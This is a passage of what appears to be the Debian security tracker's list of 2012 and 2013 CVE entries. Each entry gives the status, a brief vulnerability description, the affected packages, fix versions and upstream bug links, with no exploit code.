CVE-2012-6218 RESERVED CVE-2012-6217 RESERVED CVE-2012-6216 RESERVED CVE-2012-6215 RESERVED CVE-2012-6214 RESERVED CVE-2012-6213 RESERVED CVE-2012-6212 RESERVED CVE-2012-6211 RESERVED CVE-2012-6210 RESERVED CVE-2012-6209 RESERVED CVE-2012-6208 RESERVED CVE-2012-6207 RESERVED CVE-2012-6206 RESERVED CVE-2012-6205 RESERVED CVE-2012-6204 RESERVED CVE-2012-6203 RESERVED CVE-2012-6202 RESERVED CVE-2012-6201 RESERVED CVE-2012-6200 RESERVED CVE-2012-6199 RESERVED CVE-2012-6198 RESERVED CVE-2012-6197 RESERVED CVE-2012-6196 RESERVED CVE-2012-6195 RESERVED CVE-2012-6194 RESERVED CVE-2012-6193 RESERVED CVE-2012-6192 RESERVED CVE-2012-6191 RESERVED CVE-2012-6190 RESERVED CVE-2012-6189 RESERVED CVE-2012-6188 RESERVED CVE-2012-6187 RESERVED CVE-2012-6186 RESERVED CVE-2012-6185 RESERVED CVE-2012-6184 RESERVED CVE-2012-6183 RESERVED CVE-2012-6182 RESERVED CVE-2012-6181 RESERVED CVE-2012-6180 RESERVED CVE-2012-6179 RESERVED CVE-2012-6178 RESERVED CVE-2012-6177 RESERVED CVE-2012-6176 RESERVED CVE-2012-6175 RESERVED CVE-2012-6174 RESERVED CVE-2012-6173 RESERVED CVE-2012-6172 RESERVED CVE-2012-6171 RESERVED CVE-2012-6170 RESERVED CVE-2012-6169 RESERVED CVE-2012-6168 RESERVED CVE-2012-6167 RESERVED CVE-2012-6166 RESERVED CVE-2012-6165 RESERVED CVE-2012-6164 RESERVED CVE-2012-6163 RESERVED CVE-2012-6162 RESERVED CVE-2012-6161 RESERVED CVE-2012-6160 RESERVED CVE-2012-6159 RESERVED CVE-2012-6158 RESERVED CVE-2012-6157 RESERVED CVE-2012-6156 RESERVED CVE-2012-6155 RESERVED CVE-2012-6154 RESERVED CVE-2012-6153 RESERVED CVE-2012-6152 RESERVED CVE-2012-6151 RESERVED CVE-2012-6150 RESERVED CVE-2012-6149 RESERVED CVE-2012-6148 RESERVED CVE-2012-6147 RESERVED CVE-2012-6146 RESERVED CVE-2012-6145 RESERVED CVE-2012-6144 RESERVED CVE-2012-6143 [Storable::thaw called on untrusted inputs] RESERVED - libspoon-perl NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=85217 CVE-2012-6142 [Storable::thaw called on untrusted inputs] RESERVED NOT-FOR-US: HTML-EP CPAN module NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=85216 CVE-2012-6141 [Storable::thaw called on untrusted inputs] RESERVED NOT-FOR-US: App-Context CPAN module NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=85215 CVE-2012-6140 (pam_google_authenticator.c in the PAM module in Google Authenticator ...) - google-authenticator (bug #666129) CVE-2012-6139 (libxslt before 1.1.28 allows remote attackers to cause a denial of ...) {DSA-2654-1} - libxslt 1.1.26-14.1 (bug #703933) NOTE: http://git.gnome.org/browse/libxslt/commit/?id=6c99c519d97e5fcbec7a9537d190efb442e4e833 NOTE: http://git.gnome.org/browse/libxslt/commit/?id=dc11b6b379a882418093ecc8adf11f6166682e8d CVE-2012-6138 REJECTED CVE-2012-6137 RESERVED NOT-FOR-US: Red Hat subscription-manager CVE-2012-6136 RESERVED NOT-FOR-US: tuned (RH-specific powersaving tool) CVE-2012-6135 RESERVED - ruby-passenger (Vulnerable code not present; bug #702219) NOTE: 4.0.0 betas only CVE-2012-6134 (Cross-site request forgery (CSRF) vulnerability in the omniauth-oauth2 ...) NOT-FOR-US: ruby-omniauth, there was a sponsor request, but no ITP: http://osdir.com/ml/debian-mentors/2011-08/msg00662.html CVE-2012-6133 [XSS flaws in ok and error messages] RESERVED - roundup 1.4.20-1 NOTE: http://issues.roundup-tracker.org/issue2550724 CVE-2012-6132 [XSS flaw with the otk parameter] RESERVED - roundup 1.4.20-1 CVE-2012-6131 [XSS flaw in @action parameter] RESERVED - roundup 1.4.20-1 NOTE: http://issues.roundup-tracker.org/issue2550711 CVE-2012-6130 [XSS vulnerability when usernames contain HTML] RESERVED - roundup 1.4.20-1 NOTE: http://issues.roundup-tracker.org/issue2550684 CVE-2012-6129 (Stack-based buffer overflow in utp.cpp in libutp, as used in ...) - transmission 2.52-3+nmu1 (bug #700234) [squeeze] - transmission (UTP code not present) CVE-2012-6128 (Multiple stack-based buffer overflows in http.c in OpenConnect before ...) {DSA-2623-1} - openconnect 3.20-3 (bug #700794) NOTE: http://git.infradead.org/users/dwmw2/openconnect.git/commitdiff/26f752c3dbf69227679fc6bebb4ae071aecec491 NOTE: The fix seems to introduce a possible memory leak as regression, see BTS #700805 CVE-2012-6127 REJECTED CVE-2012-6126 REJECTED CVE-2012-6125 RESERVED - chicken 4.8.0-1 (low; bug #702410) [wheezy] - chicken (Minor issue) [squeeze] - chicken (Minor issue) CVE-2012-6124 RESERVED - chicken 4.8.0-1 (low; bug #702410) [wheezy] - chicken (Minor issue) [squeeze] - chicken (Minor issue) CVE-2012-6123 RESERVED - chicken 4.8.0-1 (low; bug #702410) [wheezy] - chicken (Minor issue) [squeeze] - chicken (Minor issue) CVE-2012-6122 RESERVED - chicken (low; bug #702410) [wheezy] - chicken (Minor issue) [squeeze] - chicken (Minor issue) CVE-2012-6121 (Cross-site scripting (XSS) vulnerability in Roundcube Webmail before ...) - roundcube (vulnerable code not in stable or testing) NOTE: http://trac.roundcube.net/ticket/1488850 NOTE: Upstream patch: https://github.com/roundcube/roundcubemail/commit/74cd0a9b62f11bc07c5a1d3ba0098b54883eb0ba CVE-2012-6120 (Red Hat OpenStack Essex and Folsom creates the /var/log/puppet ...) - puppet 2.6.4-2 [squeeze] - puppet (Minor issue) NOTE: puppet-common postinst in unstable sets dpkg-statoverride --update --add puppet puppet 0750 /var/log/puppet NOTE: After starting puppetmaster permissions on directory are restricted CVE-2012-6119 (Candlepin before 0.7.24, as used in Red Hat Subscription Asset Manager ...) NOTE: Candlepin CVE-2012-6118 (The Administer tab in Aeolus Conductor allows remote authenticated ...) NOT-FOR-US: Aeolus Cloud Configuration tool (not the pipe organ simulator in Debian) CVE-2012-6117 (Aeolus Configuration Server, as used in Red Hat CloudForms Cloud ...) NOT-FOR-US: Aeolus Cloud Configuration tool (not the pipe organ simulator in Debian) CVE-2012-6116 (modules/certs/manifests/config.pp in katello-configure before ...) NOTE: Candlepin CVE-2012-6115 (The domain management tool (rhevm-manage-domains) in Red Hat ...) NOTE: RHEV management tool CVE-2012-6114 [temp file vulnerability in git-extras] RESERVED - git-extras 1.7.0-1.2 (bug #698490) CVE-2012-6113 (The openssl_encrypt function in ext/openssl/openssl.c in PHP 5.3.9 ...) - php5 5.4.0~beta2-1 [squeeze] - php5 (Introduced in 5.3.9) NOTE: Introduced in http://git.php.net/?p=php-src.git;a=commitdiff;h=095cbc48a8f0090f3b0abc6155f2b61943c9eafb NOTE: Fixed in 5.3.14 http://git.php.net/?p=php-src.git;a=commitdiff;h=270a406ac94b5fc5cc9ef59fc61e3b4b95648a3e NOTE: https://bugs.launchpad.net/ubuntu/+source/php5/+bug/1099793 NOTE: https://bugs.php.net/bug.php?id=61413 CVE-2012-6112 (classes/GoogleSpell.php in the PHP Spellchecker (aka Google ...) - tinymce (TinyMCE Google spellchecker plugin) - wordpress 3.5.1+dfsg-2 - moodle (bug #702387) [squeeze] - wordpress (bug #701667) [squeeze] - moodle (Only affects 2.1 and above) [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2 NOTE: http://www.tinymce.com/develop/changelog/?type=phpspell NOTE: patch: https://github.com/tinymce/tinymce_spellchecker_php/commit/22910187bfb9edae90c26e10100d8145b505b974 NOTE: http://www.tinymce.com/forum/viewtopic.php?id=30036 CVE-2012-6111 [gnome-keyring does not discard stored secrets in some cases] RESERVED - libgnome-keyring (low; bug #697896) [squeeze] - libgnome-keyring (Minor issue) [wheezy] - libgnome-keyring (Minor issue) NOTE: http://www.openwall.com/lists/oss-security/2013/01/11/5 CVE-2012-6109 (lib/rack/multipart.rb in Rack before 1.1.4, 1.2.x before 1.2.6, 1.3.x ...) - ruby-rack 1.4.1-2.1 (bug #698440) - librack-ruby CVE-2012-6108 [default permissions for /var/log/hp are too open] RESERVED - hplip (permissions are 755 on wheezy, sid and experimental) CVE-2012-6107 [Does not verify that the server hostname matches a domain name in the subject's CN or subjectAltName field of the x.509 certificate] RESERVED - axis2c (bug #697974) NOTE: https://issues.apache.org/jira/browse/AXIS2C-1619 CVE-2012-6106 (calendar/managesubscriptions.php in the Manage Subscriptions ...) - moodle (Only affects 2.4) CVE-2012-6105 (blog/rsslib.php in Moodle 2.1.x before 2.1.10, 2.2.x before 2.2.7, ...) - moodle (low; bug #702387) [squeeze] - moodle (Only affects 2.1 and above) [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2 CVE-2012-6104 (blog/rsslib.php in Moodle 2.2.x before 2.2.7, 2.3.x before 2.3.4, and ...) - moodle (low; bug #702387) [squeeze] - moodle (Only affects 2.2 and above) [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2 CVE-2012-6103 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) - moodle (low; bug #702387) [squeeze] - moodle (Only affects 2.2 and above) [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2 CVE-2012-6102 (lib.php in the Submission comments plugin in the Assignment module in ...) - moodle (Only affects 2.3 and above) CVE-2012-6101 (Multiple open redirect vulnerabilities in Moodle 2.2.x before 2.2.7, ...) - moodle (low; bug #702387) [squeeze] - moodle (Only affects 2.2 and above) [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2 CVE-2012-6100 (report/outline/index.php in Moodle 2.2.x before 2.2.7, 2.3.x before ...) - moodle (low; bug #702387) [squeeze] - moodle (Only affects 2.2 and above) [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2 CVE-2012-6099 (The moodle1 backup converter in backup/converter/moodle1/lib.php in ...) - moodle [squeeze] - moodle (Only affects 2.1 and above) [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2 CVE-2012-6098 (grade/edit/outcome/edit_form.php in Moodle 1.9.x through 1.9.19, 2.1.x ...) - moodle (low; bug #702387) [squeeze] - moodle (Minor issue) [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy2 CVE-2012-6097 (File descriptor leak in cronie 1.4.8, when running in certain ...) - cronie (low; bug #697811) NOTE: Only present in experimental NOTE: https://bugzilla.novell.com/show_bug.cgi?id=786096 CVE-2012-6096 (Multiple stack-based buffer overflows in the get_history function in ...) {DSA-2653-1 DSA-2616-1} - icinga 1.7.1-5 (bug #697931) - nagios3 3.4.1-3 (bug #697930) CVE-2012-6095 (ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows ...) {DSA-2606-1} - proftpd-dfsg 1.3.4a-3 (bug #697524) CVE-2012-6094 RESERVED - cups (systemd patch not applied in Debian, see bug #697584) CVE-2012-6093 (The QSslSocket::sslErrors function in Qt before 4.6.5, 4.7.x before ...) - qt4-x11 (Only affects environments where a different OpenSSL is used, doesn't apply to Debian; bug #697582) NOTE: http://lists.qt-project.org/pipermail/announce/2013-January/000020.html NOTE: https://codereview.qt-project.org/#change,42461 NOTE: Fixed in 4:4.8.2+dfsg-10 CVE-2012-6092 (Multiple cross-site scripting (XSS) vulnerabilities in the web demos ...) - activemq (Example code not shipped in .deb) CVE-2012-6091 RESERVED CVE-2012-6090 (Multiple stack-based buffer overflows in the expand function in ...) - swi-prolog 5.10.4-5 (low; bug #697416) [squeeze] - swi-prolog 5.10.1-1+squeeze1 NOTE: https://lists.iai.uni-bonn.de/pipermail/swi-prolog/2012/009428.html NOTE: http://www.swi-prolog.org/git/pl.git/commitdiff/b2c88972e7515ada025e97e7d3ce3e34f81cf33e CVE-2012-6089 (Multiple stack-based buffer overflows in the canoniseFileName function ...) - swi-prolog 5.10.4-5 (low; bug #697416) [squeeze] - swi-prolog 5.10.1-1+squeeze1 NOTE: https://lists.iai.uni-bonn.de/pipermail/swi-prolog/2012/009428.html NOTE: http://www.swi-prolog.org/git/pl.git/commitdiff/a9a6fc8a2a9cf3b9154b490a4b1ffaa8be4d723c CVE-2012-6088 (The rpmpkgRead function in lib/package.c in RPM 4.10.x before 4.10.2 ...) - rpm 4.10.1-2.1 (bug #697375) [squeeze] - rpm (Introduced in rpm 4.10.0) [wheezy] - rpm 4.10.0-5+deb7u1 CVE-2012-6087 [moodle insecure curl usage] RESERVED - moodle [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy1 NOTE: https://github.com/tpyo/amazon-s3-php-class/pull/36 CVE-2012-6086 [zabbix insecure curl usage] RESERVED - zabbix (bug #697443) NOTE: https://support.zabbix.com/browse/ZBX-5924 CVE-2012-6085 (The read_block function in g10/import.c in GnuPG 1.4.x before 1.4.13 ...) {DSA-2601-1} - gnupg 1.4.12-7 (bug #697108) - gnupg2 2.0.19-2 (bug #697251) CVE-2012-6084 (modules/m_capab.c in (1) ircd-ratbox before 3.0.8 and (2) Charybdis ...) {DSA-2612-1} - charybdis 3.3.0-7.1 (bug #697092) - ircd-ratbox 3.0.7.dfsg-3 (bug #697093) NOTE: http://www.openwall.com/lists/oss-security/2013/01/01/1 NOTE: http://www.openwall.com/lists/oss-security/2013/01/01/2 CVE-2012-6083 RESERVED - freeciv (low; bug #696306) [squeeze] - freeciv (Minor issue) [wheezy] - freeciv (Minor issue) CVE-2012-6082 (Cross-site scripting (XSS) vulnerability in the rsslink function in ...) {DSA-2593-1} - moin 1.9.5-2 [wheezy] - moin 1.9.4-8+deb7u1 NOTE: Fix http://hg.moinmo.in/moin/1.9/rev/c98ec456e493 NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/29/7 CVE-2012-6081 (Multiple unrestricted file upload vulnerabilities in the (1) twikidraw ...) {DSA-2593-1} [wheezy] - moin 1.9.4-8+deb7u1 - moin 1.9.5-3 (bug #696948) NOTE: Fix http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/29/6 CVE-2012-6080 (Directory traversal vulnerability in the _do_attachment_move function ...) {DSA-2593-1} [wheezy] - moin 1.9.4-8+deb7u1 - moin 1.9.5-4 (bug #696949) NOTE: Fix http://hg.moinmo.in/moin/1.9/rev/3c27131a3c52 NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/29/8 CVE-2012-6079 RESERVED NOT-FOR-US: W3 Total Cache NOTE: http://www.openwall.com/lists/oss-security/2012/12/30/3 CVE-2012-6078 RESERVED NOT-FOR-US: W3 Total Cache NOTE: http://www.openwall.com/lists/oss-security/2012/12/30/3 CVE-2012-6077 RESERVED NOT-FOR-US: W3 Total Cache NOTE: http://www.openwall.com/lists/oss-security/2012/12/30/3 CVE-2012-6076 (Inkscape before 0.48.4 reads .eps files from /tmp instead of the ...) - inkscape 0.48.3.1-1.3 (low; bug #654341) [squeeze] - inkscape (Minor issue) NOTE: https://bugs.launchpad.net/inkscape/+bug/911146 CVE-2012-6075 (Buffer overflow in the e1000_receive function in the e1000 device ...) {DSA-2619-1 DSA-2608-1 DSA-2607-1} - qemu 1.1.2+dfsg-4 (bug #696051) - qemu-kvm 1.1.2+dfsg-4 (bug #696051) - xen 4.1.3-8 [squeeze] - xen (In Squeeze the code is in the package xen-qemu-dm-4.0) NOTE: http://www.openwall.com/lists/oss-security/2012/12/30/1 CVE-2012-6074 (Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before ...) - jenkins 1.447.2+dfsg-3 (bug #696816) NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-11-20 NOTE: http://www.openwall.com/lists/oss-security/2012/12/28/1 CVE-2012-6073 (Open redirect vulnerability in CloudBees Jenkins before 1.491, Jenkins ...) - jenkins 1.447.2+dfsg-3 (bug #696816) NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-11-20 NOTE: http://www.openwall.com/lists/oss-security/2012/12/28/1 CVE-2012-6072 (CRLF injection vulnerability in CloudBees Jenkins before 1.491, ...) - jenkins 1.447.2+dfsg-3 (bug #696816) - jenkins-winstone 0.9.10-jenkins-37+dfsg-2 (bug #696974) NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-11-20 NOTE: http://www.openwall.com/lists/oss-security/2012/12/28/1 CVE-2012-6071 [libnusoap-php: Curl insecure usage] RESERVED - nusoap 0.7.3-5 (low; bug #696707) [squeeze] - nusoap (Minor issue) NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/26/1 CVE-2012-6070 [falconpl: Curl insecure usage] RESERVED - falconpl 0.9.6.9-git20120606-2 (bug #696681) NOTE: CVE request http://www.openwall.com/lists/oss-security/2012/12/26/1 CVE-2011-5250 RESERVED CVE-2011-5249 RESERVED CVE-2011-5248 RESERVED CVE-2011-5247 RESERVED CVE-2009-5133 RESERVED CVE-2012-6069 (Directory traversal vulnerability in the Runtime Toolkit in CODESYS ...) NOT-FOR-US: CODESYS Runtime System CVE-2012-6068 (The Runtime Toolkit in CODESYS Runtime System 2.3.x and 2.4.x does not ...) NOT-FOR-US: CODESYS Runtime System CVE-2012-6067 (freeFTPd.exe in freeFTPd through 1.0.11 allows remote attackers to ...) NOT-FOR-US: freeFTPd CVE-2012-6066 (freeSSHd.exe in freeSSHd through 1.2.6 allows remote attackers to ...) NOT-FOR-US: freeFTPd CVE-2012-6065 (The OM Maximenu module 6.x-1.43 and earlier for Drupal, when the ...) NOT-FOR-US: Drupal plugin CVE-2012-6064 (Directory traversal vulnerability in ...) NOT-FOR-US: CMS Made Simple CVE-2012-6063 (Double free vulnerability in the sftp_mkdir function in sftp.c in ...) {DSA-2577-1} - libssh 0.5.3-1 [squeeze] - libssh 0.4.5-3+squeeze1 NOTE: Fix included in CVE-2012-4559 patch NOTE: https://red.libssh.org/issues/84 NOTE: http://git.libssh.org/projects/libssh.git/commit/?h=v0-5&id=4d8420f3282ed07fc99fc5e930c17df27ef1e9b2 CVE-2012-6062 (The dissect_rtcp_app function in epan/dissectors/packet-rtcp.c in the ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6061 (The dissect_wtp_common function in epan/dissectors/packet-wtp.c in the ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6060 (Integer overflow in the dissect_iscsi_pdu function in ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6059 (The dissect_isakmp function in epan/dissectors/packet-isakmp.c in the ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6058 (Integer overflow in the dissect_icmpv6 function in ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6057 (The dissect_eigrp_metric_comm function in ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6056 (Integer overflow in the dissect_sack_chunk function in ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6055 (epan/dissectors/packet-3g-a11.c in the 3GPP2 A11 dissector in ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6054 (The dissect_sflow_245_address_type function in ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6053 (epan/dissectors/packet-usb.c in the USB dissector in Wireshark 1.6.x ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2012-6052 (Wireshark 1.8.x before 1.8.4 allows remote attackers to obtain ...) - wireshark (unimportant) NOTE: not suitable for code injection CVE-2011-5246 RESERVED CVE-2013-0100 RESERVED CVE-2013-0099 RESERVED CVE-2013-0098 RESERVED CVE-2013-0097 RESERVED CVE-2013-0096 (Writer in Microsoft Windows Essentials 2011 and 2012 allows remote ...) NOT-FOR-US: Microsoft CVE-2013-0095 (Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for ...) NOT-FOR-US: Outlook in Microsoft Office for Mac CVE-2013-0094 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0093 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0092 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0091 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0090 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0089 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0088 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0087 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0086 (Microsoft OneNote 2010 SP1 does not properly determine buffer sizes ...) NOT-FOR-US: Microsoft OneNote CVE-2013-0085 (Buffer overflow in Microsoft SharePoint Server 2010 SP1 and SharePoint ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0084 (Directory traversal vulnerability in Microsoft SharePoint Server 2010 ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0083 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0082 RESERVED CVE-2013-0081 RESERVED CVE-2013-0080 (Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0079 (Microsoft Visio Viewer 2010 SP1 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Visio Viewer CVE-2013-0078 (The Microsoft Antimalware Client in Windows Defender on Windows 8 and ...) NOT-FOR-US: Microsoft Antimalware Client CVE-2013-0077 (Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server ...) NOT-FOR-US: Microsoft Windows CVE-2013-0076 (The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows ...) NOT-FOR-US: Microsoft Windows CVE-2013-0075 (The TCP/IP implementation in Microsoft Windows Vista SP2, Windows ...) NOT-FOR-US: Microsoft Windows CVE-2013-0074 (Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 ...) NOT-FOR-US: Microsoft Silverlight CVE-2013-0073 (The Windows Forms (aka WinForms) component in Microsoft .NET Framework ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0072 RESERVED CVE-2013-0071 RESERVED CVE-2013-0070 RESERVED CVE-2013-0069 RESERVED CVE-2013-0068 RESERVED CVE-2013-0067 RESERVED CVE-2013-0066 RESERVED CVE-2013-0065 RESERVED CVE-2013-0064 RESERVED CVE-2013-0063 RESERVED CVE-2013-0062 RESERVED CVE-2013-0061 RESERVED CVE-2013-0060 RESERVED CVE-2013-0059 RESERVED CVE-2013-0058 RESERVED CVE-2013-0057 RESERVED CVE-2013-0056 RESERVED CVE-2013-0055 RESERVED CVE-2013-0054 RESERVED CVE-2013-0053 RESERVED CVE-2013-0052 RESERVED CVE-2013-0051 RESERVED CVE-2013-0050 RESERVED CVE-2013-0049 RESERVED CVE-2013-0048 RESERVED CVE-2013-0047 RESERVED CVE-2013-0046 RESERVED CVE-2013-0045 RESERVED CVE-2013-0044 RESERVED CVE-2013-0043 RESERVED CVE-2013-0042 RESERVED CVE-2013-0041 RESERVED CVE-2013-0040 RESERVED CVE-2013-0039 RESERVED CVE-2013-0038 RESERVED CVE-2013-0037 RESERVED CVE-2013-0036 RESERVED CVE-2013-0035 RESERVED CVE-2013-0034 RESERVED CVE-2013-0033 RESERVED CVE-2013-0032 RESERVED CVE-2013-0031 RESERVED CVE-2013-0030 (The Vector Markup Language (VML) implementation in Microsoft Internet ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0029 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0028 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0027 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0026 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0025 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0024 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0023 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0022 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0021 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0020 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0019 (Use-after-free vulnerability in Microsoft Internet Explorer 7 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0018 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0017 RESERVED CVE-2013-0016 RESERVED CVE-2013-0015 (Microsoft Internet Explorer 6 through 9 does not properly perform ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0014 RESERVED CVE-2013-0013 (The SSL provider component in Microsoft Windows Vista SP2, Windows ...) NOT-FOR-US: Microsoft Windows CVE-2013-0012 RESERVED CVE-2013-0011 (The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-0010 (Cross-site scripting (XSS) vulnerability in Microsoft System Center ...) NOT-FOR-US: Microsoft System Center Opera Manager CVE-2013-0009 (Cross-site scripting (XSS) vulnerability in Microsoft System Center ...) NOT-FOR-US: Microsoft System Center Opera Manager CVE-2013-0008 (win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, ...) NOT-FOR-US: Microsoft Windows CVE-2013-0007 (Microsoft XML Core Services (aka MSXML) 4.0, 5.0, and 6.0 does not ...) NOT-FOR-US: Microsoft XML Core Services CVE-2013-0006 (Microsoft XML Core Services (aka MSXML) 3.0, 5.0, and 6.0 does not ...) NOT-FOR-US: Microsoft XML Core Services CVE-2013-0005 (The WCF Replace function in the Open Data (aka OData) protocol ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0004 (Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0003 (Buffer overflow in a System.DirectoryServices.Protocols (S.DS.P) ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0002 (Buffer overflow in the Windows Forms (aka WinForms) component in ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0001 (The Windows Forms (aka WinForms) component in Microsoft .NET Framework ...) NOT-FOR-US: Microsoft .NET Framework CVE-2012-6051 (Google CityHash computes hash values without properly restricting the ...) - cityhash (bug #694999) CVE-2011-5373 REJECTED CVE-2011-5372 REJECTED CVE-2011-5371 REJECTED CVE-2011-5370 REJECTED CVE-2012-6050 (The winbox service in MikroTik RouterOS 5.15 and earlier allows remote ...) NOT-FOR-US: MikroTik RouterOS CVE-2012-6049 (Open Solution Quick.Cart 5.0 allows remote attackers to obtain ...) NOT-FOR-US: Open Solution Quick.Cart 5.0 CVE-2012-6048 (Guitar Pro 6.1.1 r10791 allows remote attackers to cause a denial of ...) NOT-FOR-US: Guitar Pro 6.1.1 CVE-2012-6047 (Cross-site request forgery (CSRF) vulnerability in X7 Chat 2.0.5.1 and ...) NOT-FOR-US: X7 Chat 2.0.5.1 CVE-2012-6046 (Static code injection vulnerability in admin/banners.php in PHP Enter ...) NOT-FOR-US: PHP Enter CVE-2012-6045 (Cross-site scripting (XSS) vulnerability in gb/user/index.php in Ramui ...) NOT-FOR-US: Ramui Forum CVE-2012-6044 (M-Player 0.4 allows remote attackers to cause a denial of service ...) NOT-FOR-US: M-Player (different from mplayer in the archive) CVE-2012-6043 (Cross-site scripting (XSS) vulnerability in downloads.php in ...) NOT-FOR-US: phpFusion CVE-2012-6042 (GPSMapEdit 1.1.73.2 allows user-assisted remote attackers to cause a ...) NOT-FOR-US: GPSMapEdit CVE-2012-6041 (Double free vulnerability in GreenBrowser before 6.0.1002, when the ...) NOT-FOR-US: GreenBrowser CVE-2012-6040 (Cross-site scripting (XSS) vulnerability in users.php in File King ...) NOT-FOR-US: File King Advanced File Management 1.4 CVE-2012-6039 (SQL injection vulnerability in view_comments.php in YABSoft Advanced ...) NOT-FOR-US: YABSoft Advanced Image Hosting CVE-2012-6038 (admin/core/admin_func.php in razorCMS before 1.2.1 does not properly ...) NOT-FOR-US: razorCMS CVE-2010-5286 (Directory traversal vulnerability in Jstore (com_jstore) component for ...) NOT-FOR-US: Joomla jstore CVE-2010-5285 (Cross-site request forgery (CSRF) vulnerability in admin.php in ...) - collabtive (low; bug #695348) [wheezy] - collabtive (Minor issue) CVE-2010-5284 (Multiple cross-site scripting (XSS) vulnerabilities in Collabtive ...) - collabtive 0.7.6-1 (bug #695348) NOTE: Might be fixed earlier, but 0.7.6 was tested CVE-2010-5283 (Cross-site request forgery (CSRF) vulnerability in OpenText ECM ...) NOT-FOR-US: OpenText ECM CVE-2010-5282 (Multiple cross-site scripting (XSS) vulnerabilities in OpenText ECM ...) NOT-FOR-US: OpenText ECM CVE-2010-5281 